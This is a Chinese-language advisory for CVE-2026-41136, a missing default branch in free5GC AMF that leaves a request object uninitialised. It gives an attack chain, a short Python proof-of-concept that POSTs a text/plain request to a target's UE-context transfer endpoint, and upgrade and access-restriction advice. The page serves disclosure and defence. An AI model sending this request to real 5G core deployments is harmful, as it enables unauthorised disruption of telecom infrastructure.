CVE-2026-41136 CVSS 5.3 中危

CVE-2026-41136 free5GC AMF未初始化对象漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41136

漏洞类型

输入验证错误

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

free5GC AMF

漏洞概述

free5GC的AMF模块在v1.4.3之前的版本中存在安全漏洞。由于HTTPUEContextTransfer处理程序中的Content-Type switch语句缺少default分支，当收到不支持的Content-Type请求时，系统会跳过反序列化步骤并未报错，导致后续逻辑使用了完全未初始化的UeContextTransferRequest对象。

技术细节

漏洞位于internal/sbi/api_communication.go文件中。在处理HTTPUEContextTransfer请求时，代码根据Content-Type进行反序列化。由于缺少default case，攻击者可发送带有不支持Content-Type（如text/plain）的请求。此时反序列化被跳过，且err变量未被赋值（保持nil），导致程序误以为解析成功。随后处理器调用未初始化（零值）的UeContextTransferRequest对象，可能导致逻辑判断错误，破坏系统完整性。

攻击链分析

STEP 1

侦察

攻击者发现目标网络中暴露的free5GC AMF服务接口。

STEP 2

漏洞利用

攻击者向HTTPUEContextTransfer接口发送恶意构造的HTTP请求，特别指定一个不支持的Content-Type头（例如text/plain）。

STEP 3

触发漏洞

服务端因代码逻辑缺陷跳过反序列化，且未抛出错误，导致后续代码使用未初始化的UeContextTransferRequest对象进行处理。

STEP 4

影响达成

由于对象未初始化，可能导致系统状态异常或逻辑错误，从而影响系统的完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def trigger_vulnerability(target_ip):
    # Target endpoint based on handler name
    url = f"http://{target_ip}/namf-comm/v1/ue-contexts/transfer"
    
    # Use an unsupported Content-Type to bypass deserialization
    headers = {
        "Content-Type": "text/plain"
    }
    
    # Payload content is irrelevant as deserialization is skipped
    payload = "arbitrary_data"
    
    try:
        response = requests.post(url, headers=headers, data=payload, timeout=5)
        print(f"[+] Request sent to {url}")
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python poc.py <target_ip>")
    else:
        trigger_vulnerability(sys.argv[1])

影响范围

free5GC AMF < 1.4.3

防御指南

临时缓解措施

建议立即将free5GC AMF组件升级到v1.4.3版本以修复此漏洞。若无法立即升级，应配置防火墙或网络策略，严格限制对AMF SBI接口的访问来源，并监控异常的Content-Type请求头。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表